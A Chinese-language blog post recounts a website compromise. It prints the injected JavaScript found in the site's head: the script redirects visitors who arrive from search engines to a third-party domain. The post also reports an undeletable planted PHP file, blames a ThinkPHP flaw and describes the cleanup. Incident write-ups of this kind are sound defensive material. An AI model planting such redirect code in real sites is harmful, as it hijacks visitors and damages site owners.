記一次網站被黑經歷
阿新 • • 發佈:2019-04-23
blog http RoCE .proto lang 解決方法 protocol parent cti 問題原由
早上突然接到客戶電話,網站在微信中無法打開,被微信攔截
在pc端訪問網站,點擊首頁中任何一個url都會跳轉到第三方網站,恍然大悟,網站是被黑了
問題分析
發現網站head被加入一下代碼
發現js裏面代碼的如下,會強制跳轉到第三方網站:
(function () { /*百度推送代碼*/ var bp = document.createElement(‘script‘); bp.src = ‘//push.zhanzhang.baidu.com/push.js‘; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); /*360推送代碼*/ var src = document.location.protocol + ‘//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9‘; document.write(‘<script src="‘ + src + ‘" id="sozz"><\/script>‘); })(); document.writeln("<script LANGUAGE=\"Javascript\">"); document.writeln("var s=document.referrer"); document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )"); document.writeln("location.href=\"https://2019d2.com\";"); document.writeln("</script>");
打開阿裏雲虛擬主機,ftp連接到虛擬主機,發現:
- 網站根目錄多了一個文件:coonig.php,且此文件無法修改無法刪除
- index.php文件被修改
解決方法
- 提交阿裏雲工單,讓阿裏雲後臺人員刪除coonig.php文件
- 將index.php替換掉
本次被黑是由於thinkphp漏洞導致,詳見
http://www.thinkphp.cn/topic/61303.html
後續
有沒有小夥伴知道如何快速舉報一個網站?
記一次網站被黑經歷